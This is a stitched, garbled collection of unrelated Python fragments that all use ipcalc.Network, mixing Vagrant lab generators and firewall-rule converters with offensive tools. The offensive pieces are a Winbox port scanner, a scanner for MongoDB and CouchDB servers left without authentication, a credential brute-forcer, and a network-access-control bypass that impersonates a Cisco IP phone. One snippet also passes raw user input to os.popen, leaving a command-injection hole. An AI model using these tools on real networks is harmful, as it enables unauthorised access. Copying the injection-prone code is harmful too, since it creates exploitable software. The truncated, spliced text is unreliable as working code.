def calculate_ospf_uplink_ip( offset): addr_range = ipcalc.Network(DEFAULT_OSPF_CIDR) if offset > 250: offset %= 210 return addr_range[offset]
def gateway(gwcidr):
netdata = ipcalc.Network(gwcidr)
netdatalist = list(netdata)
netdatalistlen = len(netdatalist)
return str(netdatalist[0])
def writeHost(f, Host, edges):
# print("adding an host to the vagrant file")
#extrapolate each attribute from the touples
Id = Host["id"]
Name = Host["label"]
Os = Host["vm_image"]
Ram = Host["ram"]
N_Cpus = Host["n_cpus"]
Ip = Host["network_interfaces"][0]["ip_address"]
Netmask = Host["network_interfaces"][0]["netmask"]
Interface = Host["network_interfaces"][0]["name_interface"]
EdgeReference = Host["network_interfaces"][0]["edge"]
UplinkBandwidth = 0
DownlinkBandwidth = 0
for edge in edges:
if EdgeReference[0] == edge["from"] and EdgeReference[1] == edge["to"]:
UplinkBandwidth = edge["bandwidth_up"]
DownlinkBandwidth = edge["bandwidth_down"]
IpNoSub = Ip.split("/")[0]
Network = ipcalc.Network(Ip)
IpNet = Network.network()
CustumScript = Host["custom_script"]
#there must be a more efficient way to calculate this, this one is too trivial
for x in Network:
Gateway = str(x)
f.write("config.vm.define \"" + Name + "\" do |" + Name + "|\n")
f.write(Name + ".vm.box = \"" + Os + "\"\n")
f.write(Name + ".vm.hostname = \"" + Name + "\"\n")
f.write(Name + ".vm.network \"private_network\", ip: \"" + IpNoSub +"\", netmask: \"" + Netmask + "\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: true\n")
f.write(Name + ".vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n")
f.write("echo \"Static Routig configuration Started for " + Name + "\"\n")
f.write("sudo sysctl -w net.ipv4.ip_forward=1\n")
f.write("sudo route add -net " + str(IpNet) + " netmask " + Netmask + " gw " + Gateway + " dev " + Interface + "\n")
f.write('cd /home/vagrant\n')
f.write('git clone https://github.com/magnific0/wondershaper.git\n')
f.write('cd wondershaper\n')
for edge in edges:
if UplinkBandwidth > 0 or DownlinkBandwidth > 0:
f.write('sudo ./wondershaper -a ' + Interface)
if DownlinkBandwidth > 0:
f.write(' -d ' + str(DownlinkBandwidth))
if UplinkBandwidth > 0:
f.write(' -u ' + str(UplinkBandwidth))
f.write('\n')
#here there is the custum script
f.write(CustumScript + " \n")
f.write("echo \"Configuration END\"\n")
f.write("echo \"" + Name + " is ready to Use\"\n")
f.write("SHELL\n")
f.write(Name + ".vm.provider \"virtualbox\" do |vb|\n")
f.write("vb.memory = " + Ram + "\n")
f.write("end\n")
f.write("end\n")
ipaddr = z['ip']['ip']
servername = z['ip']['serverName']
ips_pool.append(ipaddr)
except any:
pass
# Open the server pool file and add the content to the list
with open(search_pool_file_name) as f:
content = f.readlines()
for lines in content:
search_pool.append(lines.replace('\n', ''))
# Search the IPs found in leaseweb message
print(
"\n \nPlease wait for another while until we compare the pool with the input.."
)
print("========= Concerned IPs =========")
for ip_to_calc in search_pool:
for x in ipcalc.Network(ip_to_calc):
if x in ips_pool:
print(x)
results.append(x)
# Print message if no results
results_count = len(results)
if results_count == 0:
print("\nNo Match Found")
print("\nFinished: SUCCESS")
def doscan(dst):
print("ip =",dst)
if ActiveScan.Host(src=src, dst=dst).isup():
print("Host is up")
ActiveScan.TCPPortScan(src=src,dst=dst)
else:
print("Host is Down")
ip = Ip()
ip.check_ip_type()
src = "192.168.1.164"
dst = "192.168.1.0/16"
n = ipcalc.Network(dst)
host_first = n.host_first()
host_last = n.host_last()
splited_first_ip = str(host_first).split('.')
splited_last_ip = str(host_last).split('.')
a = False
b = False
c = False
d = False
if splited_first_ip[0] != splited_last_ip[0]:
a = True
if splited_first_ip[1] != splited_last_ip[1]:
def writeHost(f, Host, Topology):
print("adding an host to the vagrant file")
#extrapolate each attribute from the touples
Id = Host[1]["Id"]
Name = Host[1]["Name"]
Os = Host[1]["Os"]
Ram = Host[1]["Ram"]
CustumScript = Host[1]["custom_script"]
Ip = Host[1]["Network"][0]["Ip"]
Netmask = Host[1]["Network"][0]["Netmask"]
Interface = Host[1]["Network"][0]["Interface"]
IpNoSub = Ip.split("/")[0]
Network = ipcalc.Network(Ip)
IpNet = Network.network()
Ip2 = Topology[4][1]["Network"][0]["Ip"]
Mask2 = Topology[4][1]["Network"][0]["Netmask"]
Network2 = ipcalc.Network(Ip2)
IpNet2 = str(Network2.network())
Ip3 = Topology[3][1]["Network"][0]["Ip"]
Mask3 = Topology[3][1]["Network"][0]["Netmask"]
Network3 = ipcalc.Network(Ip3)
IpNet3 = str(Network3.network())
Ip4 = Topology[3][1]["Network"][1]["Ip"]
Mask4 = Topology[3][1]["Network"][1]["Netmask"]
Network4 = ipcalc.Network(Ip4)
IpNet4 = str(Network4.network())
Ip8 = Topology[5][1]["Network"][0]["Ip"]
Mask8 = Topology[5][1]["Network"][0]["Netmask"]
Network8 = ipcalc.Network(Ip8)
IpNet8 = str(Network8.network())
Ip12 = Topology[5][1]["Network"][1]["Ip"]
Mask12 = Topology[5][1]["Network"][1]["Netmask"]
Network12 = ipcalc.Network(Ip12)
IpNet12 = str(Network12.network())
if Id is 1:
Gateway = Ip8.split("/")[0]
if Id is 2:
Gateway = Ip12.split("/")[0]
if Id is 3:
Gateway = Ip2.split("/")[0]
f.write("config.vm.define \"" + Name + "\" do |" + Name + "|\n")
f.write(Name + ".vm.box = \"" + Os + "\"\n")
f.write(Name + ".vm.hostname = \"" + Name + "\"\n")
if Id is 1:
f.write(Name + ".vm.network \"private_network\", ip: \"" + IpNoSub +
"\", netmask: \"" + Netmask +
"\", virtualbox__intnet: \"broadcast_host_" + Name +
"\", auto_config: true\n")
if Id is 2:
f.write(Name + ".vm.network \"private_network\", ip: \"" + IpNoSub +
"\", netmask: \"" + Netmask +
"\", virtualbox__intnet: \"broadcast_host_" + Name +
"\", auto_config: true\n")
if Id is 3:
f.write(
Name + ".vm.network \"private_network\", ip: \"" + IpNoSub +
"\", netmask: \"" + Netmask +
"\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\n"
)
f.write("#.vm.provision \"shell\", inline: <<-SHELL\n")
f.write(
"#echo \"Installation of Lynx Text-Based Browser to access the Web-Server via terminal on "
+ Name + "\"\n")
f.write("#sudo apt-get update\n")
f.write("#sudo apt-get install -y lynx\n")
f.write("#echo \"Lynx-Browser is installed\"\n")
f.write("#SHELL\n")
f.write(Name +
".vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n")
f.write("echo \"Static Routig configuration Started for " + Name + "\"\n")
f.write("sudo sysctl -w net.ipv4.ip_forward=1\n")
f.write("sudo route add -net " + IpNet2 + " netmask " + Mask2 + " gw " +
Gateway + " dev " + Interface + "\n")
f.write("sudo route add -net " + IpNet3 + " netmask " + Mask3 + " gw " +
Gateway + " dev " + Interface + "\n")
f.write("sudo route add -net " + IpNet4 + " netmask " + Mask4 + " gw " +
Gateway + " dev " + Interface + "\n")
if Id is 1:
f.write("sudo route add -net " + IpNet12 + " netmask " + Mask12 +
" gw " + Gateway + " dev " + Interface + "\n")
if Id is 2:
f.write("sudo route add -net " + IpNet8 + " netmask " + Mask8 +
" gw " + Gateway + " dev " + Interface + "\n")
if Id is 3:
f.write("sudo route add -net " + IpNet8 + " netmask " + Mask8 +
" gw " + Gateway + " dev " + Interface + "\n")
f.write("sudo route add -net " + IpNet12 + " netmask " + Mask12 +
" gw " + Gateway + " dev " + Interface + "\n")
f.write("echo \"Configuration END\"\n")
f.write("echo \"" + Name + " is ready to Use\"\n")
f.write("SHELL\n")
if Id is 3:
f.write(Name + ".vm.provision \"shell\", inline: <<-SHELL\n")
f.write("echo \"Installation of Web-Server\"\n")
f.write("sudo apt-get update\n")
f.write("sudo apt-get install -y apache2\n")
f.write("echo \"Web-ServerServer is installed and Runing\"\n")
f.write("SHELL\n")
f.write(Name + ".vm.provider \"virtualbox\" do |vb|\n")
f.write("vb.memory = " + Ram + "\n")
f.write("end\n")
f.write("end\n")
def main():
"""
Main execution routine
"""
parser = argparse.ArgumentParser(description='Tetration Policy to CSV')
parser.add_argument('--maxlogfiles', type=int, default=10, help='Maximum number of log files (default is 10)')
parser.add_argument('--debug', nargs='?',
choices=['verbose', 'warnings', 'critical'],
const='critical',
help='Enable debug messages.')
parser.add_argument('--config', default=None, help='Configuration file')
args = parser.parse_args()
if args.config is None:
print '%% No configuration file given'
return
# Load in the configuration
try:
with open(args.config) as config_file:
config = json.load(config_file)
except IOError:
print '%% Could not load configuration file'
return
except ValueError:
print 'Could not load improperly formatted configuration file'
return
# Load in the IANA Protocols
protocols = {}
try:
with open('protocol-numbers-1.csv') as protocol_file:
reader = csv.DictReader(protocol_file)
for row in reader:
protocols[row['Decimal']]=row
except IOError:
print '%% Could not load protocols file'
return
except ValueError:
print 'Could not load improperly formatted protocols file'
return
# Load in ASA known ports
ports = {}
try:
with open('asa_ports.csv') as protocol_file:
reader = csv.DictReader(protocol_file)
for row in reader:
ports[row['Port']]=row
except IOError:
print '%% Could not load protocols file'
return
except ValueError:
print 'Could not load improperly formatted protocols file'
return
cdb = ConfigDB()
cdb.store_config(config)
clusters = cdb.get_epg_policies()
policies = cdb.get_contract_policies()
#Process nodes and output information to CSV
for cluster in clusters:
##Uncomment for ASA Config
print "object network " + cluster.name.replace(' ','_')
for node in cluster.get_node_policies():
##Uncomment for ASA Config
node_dict = node.__dict__
#print node.__dict__['_policy']
if 'prefix_len' in node_dict['_policy'].keys():
subnet = ipcalc.Network(node.ip + '/' + str(node_dict['_policy']['prefix_len']))
print " subnet " + str(subnet.network()) + ' ' + str(subnet.netmask())
#print node_dict['_policy']['prefix_len']
else:
print " host " + node.ip
print '!'
#Process policies and output information to CSV
for policy in policies:
for rule in policy.get_whitelist_policies():
##Uncomment for ASA Config
if policy.src_name == 'External' and policy.dst_name != 'External':
if rule.proto == '1':
#print "access-list ACL_IN extended permit " + protocols[rule.proto]['Keyword'] + " object-group " + policy.src_name.replace(' ','_') + " object-group " + policy.dst_name.replace(' ','_')
print "access-list ACL_IN extended permit " + protocols[rule.proto]['Keyword'] + " any object " + policy.dst_name.replace(' ','_')
elif (rule.proto == '6') or (rule.proto == '17'):
if rule.port_min == rule.port_max:
if (str(rule.port_min) in ports.keys()) and (ports[str(rule.port_min)]['Proto'] == protocols[rule.proto]['Keyword'] or ports[str(rule.port_min)]['Proto'] == 'TCP, UDP'):
port = ports[str(rule.port_min)]['Name']
else:
port = rule.port_min
#print "access-list ACL_IN extended permit " + protocols[rule.proto]['Keyword'] + " object-group " + policy.src_name.replace(' ','_') + " object-group " + policy.dst_name.replace(' ','_') + " eq " + rule.port_min
print "access-list ACL_IN extended permit " + protocols[rule.proto]['Keyword'] + " any object " + policy.dst_name.replace(' ','_') + " eq " + port
else:
#print "access-list ACL_IN extended permit " + protocols[rule.proto]['Keyword'] + " object-group " + policy.src_name.replace(' ','_') + " object-group " + policy.dst_name.replace(' ','_') + " range " + rule.port_min + "-" + rule.port_max
print "access-list ACL_IN extended permit " + protocols[rule.proto]['Keyword'] + " any object " + policy.dst_name.replace(' ','_') + " range " + rule.port_min + "-" + rule.port_max
def gen(self, ip):
localnet = ipcalc.Network(self.target)
if ip[0] in localnet:
return True
else:
return False
def get_nw_info(self):
#
# function to grab n/w details from RE sheet
#
# args: none
#
# dependencies:
# variables - subnet.col, subnet.row
#
# functions - ipcalc, __append_to_file()
#
# returns: none
#
# side effects: updates rack text files
#
nullcount = 0
nwinfo = {}
interface = 1
col = self.subnet.col
rowNum = self.subnet.row + 1
while True:
if self.sheet.cell(row=rowNum, column=col).value == None:
nullcount = nullcount + 1
if nullcount > 2:
break
rowNum = rowNum + 1
continue
subnet = self.sheet.cell(row=rowNum, column=col).value
if re.match(r'\d+\.\d+\.\d+\.\d+/\d+', subnet):
nwinfo[interface] = {}
nwinfo[interface]["subnet"] = subnet
#rowNum = rowNum + 1
nullcount = 0
else:
break
vlan = self.sheet.cell(row=rowNum, column=col - 3).value
vlan = unicode(vlan)
if re.match(r'\d+', vlan):
nwinfo[interface]["vlan"] = vlan
else:
raise ValueError(
"Given VLAN number is invalid for subnet: %s" % (subnet))
category = self.sheet.cell(row=rowNum, column=col - 4).value
if re.match(r'\S+', category):
nwinfo[interface]["category"] = category
else:
raise ValueError(
"Given interface category is invalid for subnet: %s" %
(subnet))
rowNum = rowNum + 1
interface = interface + 1
#print nwinfo
###############################################################
#vlan_info_count = 10
# get the last row number of the network details section in spreadsheet
#vlan_info_count = self.__get_nw_rows(self.subnet.col, self.subnet.row+1)
#interface_category = self.__get_rows(self.interface.col, self.interface.row+1, self.interface.row + vlan_info_count)
#subnet_details = self.__get_rows(self.subnet.col, self.subnet.row+1, self.subnet.row + vlan_info_count)
#vlans = self.__get_rows(self.vlan.col, self.vlan.row+1, self.vlan.row + vlan_info_count)
class NwInfo(object):
def __init__(self,
ipcalc_nw_obj=None,
pkey=None,
vlan=None,
connector=None):
self.ipcalc_nw_obj = ipcalc_nw_obj
self.pkey = pkey
self.vlan = vlan
self.connector = connector
fe_list = []
dom0_host = None
connectors = 0
#for i, interface_val in enumerate(interface_category):
for i in nwinfo:
#nw = ipcalc.Network(subnet_details[i])
nw = ipcalc.Network(nwinfo[i]["subnet"])
#vlan = str(vlans[i])
vlan = nwinfo[i]["vlan"]
pkey_val = '3a%s' % (vlan[-2:])
vlan_val = 'some-emea-name-v%s' % (vlan)
interface_val = nwinfo[i]["category"]
###if interface_val.lower() == 'FE'.lower():
if 'FE'.lower() in interface_val.lower():
nw_info_obj = NwInfo(ipcalc_nw_obj=nw,
pkey=pkey_val,
vlan=vlan_val,
connector=connectors + 1)
fe_list.append(nw_info_obj)
connectors = connectors + 1
if vlan == '300':
dom0_host = NwInfo(ipcalc_nw_obj=nw, vlan=vlan_val)
for fe in fe_list:
nw = fe.ipcalc_nw_obj
self.__append_to_file(
'\n##############################################################################'
)
self.__append_to_file('# Network: \t%s' % (nw.network()))
self.__append_to_file('# Netmask: \t%s' % (nw.netmask()))
self.__append_to_file('# Broadcast: \t%s' % (nw.broadcast()))
self.__append_to_file('# Gateway: \t%s' % (nw.host_first()))
self.__append_to_file('# VLAN: \t%s' % (fe.vlan))
self.__append_to_file('# PKEY: \t%s' % (fe.pkey))
self.__append_to_file('# Connectors:\t%d' % (fe.connector))
nw = dom0_host.ipcalc_nw_obj
self.__append_to_file(
'\n##############################################################################'
)
self.__append_to_file('# Network: \t%s' % (nw.network()))
self.__append_to_file('# Netmask: \t%s' % (nw.netmask()))
self.__append_to_file('# Broadcast: \t%s' % (nw.broadcast()))
self.__append_to_file('# Gateway: \t%s' % (nw.host_first()))
self.__append_to_file('# VLAN: \t%s' % (dom0_host.vlan))
#gnmap = open(sys.argv[1],"r+")
#todas_las_lineas = gnmap.readlines()
#gnmap.close()
whois = "whois "+sys.argv[1]
a = os.popen(whois).read()
todas_las_lineas = StringIO.StringIO(a)
for cada_linea in todas_las_lineas:
#Separa por slash para sacar la mascara
delimitador1 = cada_linea.split('/')
#Separa por dos puntos para sacar la IP/mascara
delimitador2 = cada_linea.split(':')
#Busca la linea inetnum:
linea_inetnum = str(delimitador1[0:1]).strip('[]').replace("'","")[:8]
#Valida si los primeros 8 chars dicen inetnum: porque asi identica que es la linea con la info
if linea_inetnum == "inetnum:":
mascara = str(delimitador1[1:2]).strip('[]').replace("'","")[:2]
#print mascara
#Valida si es una supernet...
if int(mascara) < 24 :
print "Es una supernet no asignada"
exit()
inetnum =ipcalc.Network(str(delimitador2[1:2]).strip('[]').replace("'","").replace("\\n",""))
print "Direccion IP del primer Host:"+str(inetnum.host_first())
print "Direccion IP del ultimo Host:"+str(inetnum.host_last())wcuestas@31337:~/ehtoolz/open-sec$
import socket
import sys
from datetime import datetime
from time import *
import ipcalc
import optparse
parser = optparse.OptionParser()
inputSw, args = parser.parse_args()
print("BENDJEDDOU[+]")
t1=datetime.now()
print("Scanning start on ip/ips ...")
targets = ipcalc.Network(sys.argv[1])
i = 0
try:
file = open('list_ips.txt', 'w')
for singleIp in targets:
ip = str(singleIp)
if __name__ == "__main__":
i = i + 1
port = (8291)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(0.3)
print (i , "/" , len(targets) ," ", end="")
if (s.connect_ex((ip,port))==0):
print(("%s PORT %s:OPEN "%(ip,port)))
file.write(ip)
else :
def length(prefix):
sn = ipcalc.Network(prefix)
return sn.subnet()
def subnet_mask(prefix):
sn = ipcalc.Network(prefix)
return sn.netmask()
def gateway(prefix):
return ipcalc.Network(prefix).host_first()
def writeRouter(f, Router, Topology):
print("adding a router to the vagrant file")
#extrapolate each attribute from the touples
Id = Router[1]["Id"]
Name = Router[1]["Name"]
Ram = Router[1]["Ram"]
Os = Router[1]["Os"]
CustumScript = Router[1]["custom_script"]
Ip1 = Router[1]["Network"][0]["Ip"]
Netmask1 = Router[1]["Network"][0]["Netmask"]
Interface1 = Router[1]["Network"][0]["Interface"]
IpNoSub1 = Ip1.split("/")[0]
Ip2 = Router[1]["Network"][1]["Ip"]
Netmask2 = Router[1]["Network"][1]["Netmask"]
Interface2 = Router[1]["Network"][1]["Interface"]
IpNoSub2 = Ip2.split("/")[0]
if Id is 4:
tag = "1"
if Id is 5:
tag = "2"
Ip2 = Topology[4][1]["Network"][0]["Ip"]
Mask2 = Topology[4][1]["Network"][0]["Netmask"]
Network2 = ipcalc.Network(Ip2)
IpNet2 = str(Network2.network())
Ip3 = Topology[5][1]["Network"][2]["Ip"]
Mask3 = Topology[5][1]["Network"][2]["Netmask"]
Network3 = ipcalc.Network(Ip3)
IpNet3 = str(Network3.network())
Ip8 = Topology[5][1]["Network"][0]["Ip"]
Mask8 = Topology[5][1]["Network"][0]["Netmask"]
Network8 = ipcalc.Network(Ip8)
IpNet8 = str(Network8.network())
Ip12 = Topology[5][1]["Network"][1]["Ip"]
Mask12 = Topology[5][1]["Network"][1]["Netmask"]
Network12 = ipcalc.Network(Ip12)
IpNet12 = str(Network12.network())
GatewaySwitch = Topology[5][1]["Network"][2]["Ip"]
GatewaySwitch = GatewaySwitch.split("/")[0]
GatewayRouter1 = Topology[3][1]["Network"][1]["Ip"]
GatewayRouter1 = GatewayRouter1.split("/")[0]
GatewayRouter2 = Topology[4][1]["Network"][1]["Ip"]
GatewayRouter2 = GatewayRouter2.split("/")[0]
f.write("config.vm.define \"" + Name + "\" do |" + Name + "|\n")
f.write(Name + ".vm.box = \"" + Os + "\"\n")
f.write(Name + ".vm.hostname = \"" + Name + "\"\n")
f.write(Name + ".vm.network \"private_network\", ip: \"" + IpNoSub1 +
"\", netmask: \"" + Netmask1 +
"\", virtualbox__intnet: \"broadcast_router-south-" + tag +
"\", auto_config: true\n")
f.write(
Name + ".vm.network \"private_network\", ip: \"" + IpNoSub2 +
"\", netmask: \"" + Netmask2 +
"\", virtualbox__intnet: \"broadcast_router-inter\", auto_config: true\n"
)
f.write(Name +
".vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n")
f.write("echo \"Static Routig configuration Started\"\n")
f.write("sudo sysctl -w net.ipv4.ip_forward=1\n")
if Id is 4:
f.write("sudo route add -net " + IpNet2 + " netmask " + Mask2 +
" gw " + GatewayRouter2 + " dev " + Interface2 + "\n")
f.write("sudo route add -net " + IpNet8 + " netmask " + Mask8 +
" gw " + GatewaySwitch + " dev " + Interface1 + "\n")
f.write("sudo route add -net " + IpNet12 + " netmask " + Mask12 +
" gw " + GatewaySwitch + " dev " + Interface1 + "\n")
if Id is 5:
f.write("sudo route add -net " + IpNet3 + " netmask " + Mask3 +
" gw " + GatewayRouter1 + " dev " + Interface2 + "\n")
f.write("sudo route add -net " + IpNet8 + " netmask " + Mask8 +
" gw " + GatewayRouter1 + " dev " + Interface2 + "\n")
f.write("sudo route add -net " + IpNet12 + " netmask " + Mask12 +
" gw " + GatewayRouter1 + " dev " + Interface2 + "\n")
f.write("echo \"Configuration END\"\n")
f.write("echo \"" + Name + " is ready to Use\"\n")
f.write("SHELL\n")
f.write(Name + ".vm.provider \"virtualbox\" do |vb|\n")
f.write("vb.memory = " + Ram + "\n")
f.write("end\n")
f.write("end\n")
def set_subnet(self, *args):
self.subnet = ipcalc.Network(args)
def writeSwitch(f, Switch, Topology):
#extrapolate each attribute from the touples
Name = Switch[1]["Name"]
Ram = Switch[1]["Ram"]
Os = Switch[1]["Os"]
CustumScript = Switch[1]["custom_script"]
IpA = Switch[1]["Network"][0]["Ip"]
NetmaskA = Switch[1]["Network"][0]["Netmask"]
InterfaceA = Switch[1]["Network"][0]["Interface"]
IpB = Switch[1]["Network"][1]["Ip"]
NetmaskB = Switch[1]["Network"][1]["Netmask"]
InterfaceB = Switch[1]["Network"][1]["Interface"]
IpSW = Switch[1]["Network"][2]["Ip"]
NetmaskSW = Switch[1]["Network"][2]["Netmask"]
InterfaceSW = Switch[1]["Network"][2]["Interface"]
Gateway = Topology[3][1]["Network"][0]["Ip"]
Gateway = Gateway.split("/")[0]
Ip2 = Topology[4][1]["Network"][0]["Ip"]
Mask2 = Topology[4][1]["Network"][0]["Netmask"]
Network2 = ipcalc.Network(Ip2)
IpNet2 = str(Network2.network())
Ip4 = Topology[3][1]["Network"][1]["Ip"]
Mask4 = Topology[3][1]["Network"][1]["Netmask"]
Network4 = ipcalc.Network(Ip4)
IpNet4 = str(Network4.network())
print("adding a switch to the vagrant file")
f.write("config.vm.define \"" + Name + "\" do |" + Name + "|\n")
f.write(Name + ".vm.box = \"" + Os + "\"\n")
f.write(Name + ".vm.hostname = \"" + Name + "\"\n")
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: false\n"
)
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_host_"
+ Topology[0][1]["Name"] + "\", auto_config: false\n")
f.write(
Name +
".vm.network \"private_network\", virtualbox__intnet: \"broadcast_host_"
+ Topology[1][1]["Name"] + "\", auto_config: false\n")
f.write(Name + ".vm.provision \"shell\", inline: <<-SHELL\n")
f.write("echo \"OpenVSwitch Installation is started\"\n")
f.write("apt-get update\n")
f.write("apt-get install -y tcpdump\n")
f.write(
"apt-get install -y openvswitch-common openvswitch-switch apt-transport-https ca-certificates curl software-properties-common\n"
)
f.write("echo \"OpenVSwitch Bridge Configuration Started\"\n")
f.write("sudo ovs-vsctl add-br SW1\n")
f.write("sudo ovs-vsctl add-br HA\n")
f.write("sudo ovs-vsctl add-br HB\n")
f.write("sudo ovs-vsctl add-port SW1 eth1\n")
f.write("sudo ovs-vsctl add-port HA eth2\n")
f.write("sudo ovs-vsctl add-port HB eth3\n")
f.write("echo \"Bridge configuration END\"\n")
f.write("SHELL\n")
f.write(Name +
".vm.provision \"shell\", run: \"always\", inline: <<-SHELL\n")
f.write("echo \"OpenVSwitch Ip addressing is started\"\n")
f.write("sudo ifconfig SW1 " + IpSW + "\n")
f.write("sudo ifconfig HA " + IpA + "\n")
f.write("sudo ifconfig HB " + IpB + "\n")
f.write("sudo ifconfig SW1 up\n")
f.write("sudo ifconfig HA up\n")
f.write("sudo ifconfig HB up\n")
f.write("sudo ifconfig eth1 up\n")
f.write("sudo ifconfig eth2 up\n")
f.write("sudo ifconfig eth3 up\n")
f.write("sudo sysctl -w net.ipv4.ip_forward=1\n")
f.write("sudo route add -net " + IpNet2 + " netmask " + Mask2 + " gw " +
Gateway + " dev " + InterfaceSW + "\n")
f.write("sudo route add -net " + IpNet4 + " netmask " + Mask4 + " gw " +
Gateway + " dev " + InterfaceSW + "\n")
f.write("echo \"Configuration END\"\n")
f.write("echo \"" + Name + " is ready to Use\"\n")
f.write("SHELL\n")
f.write(Name + ".vm.provider \"virtualbox\" do |vb|\n")
# User can select the desired menmory for the machine. we must allow them
f.write("vb.memory = " + Ram + "\n")
f.write("end\n")
f.write("end\n")
def massScan(platform, args=None):
yes_tag = ['y', 'Y']
no_tag = ['n', 'N']
optCheck = True
loadCheck = False
ping = False
success = []
versions = []
creds = []
commError = []
ipList = []
resultSet = []
print "\n"
print platform + " Default Access Scanner"
print "=============================="
print "1-Scan a subnet for default " + platform + " access"
print "2-Loads IPs to scan from a file"
print "3-Enable/disable host pings before attempting connection"
print "x-Return to main menu"
while optCheck:
loadOpt = raw_input("Select an option: ")
if loadOpt == "1":
subnet = raw_input("Enter subnet to scan: ")
try:
for ip in ipcalc.Network(subnet):
ipList.append(str(ip))
optCheck = False
except NoSQLMapException:
raw_input(
"Not a valid subnet. Press enter to return to main menu.")
return
if loadOpt == "2":
while loadCheck == False:
loadPath = raw_input("Enter file name with IP list to scan: ")
try:
with open(loadPath) as f:
ipList = f.readlines()
loadCheck = True
optCheck = False
except NoSQLMapException:
print "Couldn't open file."
if loadOpt == "3":
if ping == False:
ping = True
print "Scan will ping host before connection attempt."
elif ping == True:
ping = False
print "Scan will not ping host before connection attempt."
if loadOpt == "x":
return
print "\n"
for target in ipList:
if platform == "MongoDB":
result = nsmmongo.mongoScan(target.rstrip(), 27017, ping)
elif platform == "CouchDB":
result = nsmcouch.couchScan(target.rstrip(), 5984, ping)
if result[0] == 0:
print "Successful default access on " + target.rstrip(
) + "(" + platform + " Version: " + result[1] + ")."
success.append(target.rstrip())
versions.append(result[1])
elif result[0] == 1:
print platform + " running but credentials required on " + target.rstrip(
) + "."
creds.append(target.rstrip()) # Future use
elif result[0] == 2:
print "Successful " + platform + " connection to " + target.rstrip(
) + " but error executing command."
commError.append(target.rstrip()) # Future use
elif result[0] == 3:
print "Couldn't connect to " + target.rstrip() + "."
elif result[0] == 4:
print target.rstrip() + " didn't respond to ping."
print "\n\n"
select = True
while select:
saveEm = raw_input("Save scan results to CSV? (y/n):")
if saveEm in yes_tag:
savePath = raw_input("Enter file name to save: ")
outCounter = 0
try:
fo = open(savePath, "wb")
fo.write("IP Address," + platform + " Version\n")
for server in success:
fo.write(server + "," + versions[outCounter] + "\n")
outCounter += 1
fo.close()
print "Scan results saved!"
select = False
except NoSQLMapException:
print "Couldn't save scan results."
elif saveEm in no_tag:
select = False
else:
select = True
print "Discovered " + platform + " Servers with No Auth:"
print "IP" + " " + "Version"
outCounter = 1
for server in success:
print str(outCounter) + "-" + server + " " + versions[outCounter - 1]
outCounter += 1
select = True
print "\n"
while select:
select = raw_input("Select a NoSQLMap target or press x to exit: ")
if select == "x" or select == "X":
return None
elif select.isdigit() == True and int(select) <= outCounter:
victim = success[int(select) - 1]
resultSet[0] = True
resultSet[1] = victim
raw_input(
"New target set! Press enter to return to the main menu.")
return resultSet
else:
raw_input("Invalid selection.")
def getNetwork(self):
return ipcalc.Network(self.network)
format(datetime.now(), host, username, password))
sleep(1)
self.printer.put("[CONTROL] THREAD FINISH")
hosts = Queue()
printer = Queue()
terminator = Event()
usernames = []
passwords = []
try:
print("Loading credentials...")
if sys.argv[1].lower() == "localhost":
hosts.put("127.0.0.1")
else:
for ip in ipcalc.Network(sys.argv[1]):
hosts.put(str(ip))
f = open(sys.argv[3], "r")
passes = f.readlines()
f.close()
for password in passes:
passwords.append(password.strip("\r").strip("\n"))
f = open(sys.argv[2], "r")
users = f.readlines()
f.close()
for username in users:
usernames.append(username.strip("\r").strip("\n"))
try:
if sys.argv[4].lower() == "-v" or sys.argv[4].lower() == "--verbose":
verbose = True
def main():
global DEBUG
global EAP
global EPING
global ETRACE
global EDNS
global EWEB
global ESSL
global EPRX
opciones = parsingopt()
if opciones.verbose:
DEBUG = True
if opciones.nic:
iface = opciones.nic
if opciones.wnic:
wiface = opciones.wnic
EAP = True
if opciones.ping:
EPING = True
if opciones.trace:
ETRACE = True
if opciones.dns:
EDNS = True
if opciones.web:
EWEB = True
if opciones.ssl:
ESSL = True
if opciones.prx:
EPRX = True
# Load Scapy modules
load_contrib("cdp")
load_contrib("lldp")
# Bring LAN interface up
#subprocess.call('/sbin/ifconfig ' + iface + ' up', shell=True)
# Change MAC, became a Cisco IP-Phone!
if DEBUG:
print('MAC change started - phone')
changemac(iface, phonemac)
if DEBUG:
print('MAC change ended - phone')
# Listen for CDP packets to get hostname from it
if DEBUG:
print('CDP/LLDP discover started')
discover(opciones)
if DEBUG:
print('CDP/LLDP discover ended')
# Grab an IP using DHCP
if DEBUG:
print('DHCP started')
dh = DHCPHandler(iface, 'SEP' + phonemac.replace(':', ''))
dh.daemon = True
dh.start()
time.sleep(0.5)
mac = get_if_hwaddr(iface)
chaddr = ''.join([chr(int(x, 16)) for x in mac.split(':')])
xid = random.randint(0, 0xFFFF)
dhcpdiscover = (Ether(src=mac, dst="ff:ff:ff:ff:ff:ff") /
IP(src="0.0.0.0", dst="255.255.255.255") /
UDP(sport=68, dport=67) / BOOTP(chaddr=chaddr, xid=xid) /
DHCP(options=[('message-type', 'discover'), 'end']))
sendp(dhcpdiscover, iface=iface, verbose=0)
time.sleep(10)
ip, netmask, gwip, dns_srv, domain, wpad = dh.join()
# need to add module for static ip in case DHCP doesn't work
if DEBUG:
print('DHCP ended')
# Configure interface
if DEBUG:
print('Interface config started')
setip(iface, ip, netmask, gwip, dns_srv)
if DEBUG:
print('Interface config ended')
# Capture ARP responses
if DEBUG:
print('ARP gw started')
# Send ARP WHO-HAS to grab MAC from default gateway
query = Ether(src=mac, dst="ff:ff:ff:ff:ff:ff") / ARP(
op=1, psrc=ip, pdst=gwip)
ans, a = srp(query, iface=iface, timeout=2, verbose=0)
for a, rcv in ans:
gwmac = rcv[Ether].src
break
if DEBUG:
print('ARP gw ended')
# Pretend to be a phone to bypass NAC, tune the amount of time you want
cdppkt = rdpcap(phonecdptpl, 1)
cdpdh = CDPHandler(iface, cdppkt, phonemac, ip,
'SEP' + phonemac.replace(':', ''), 'Port 1')
cdpdh.daemon = True
cdpdh.start()
# Stop calling .join() after X seconds (default 60sec)
if DEBUG:
print('CDPd started - phone')
time.sleep(10)
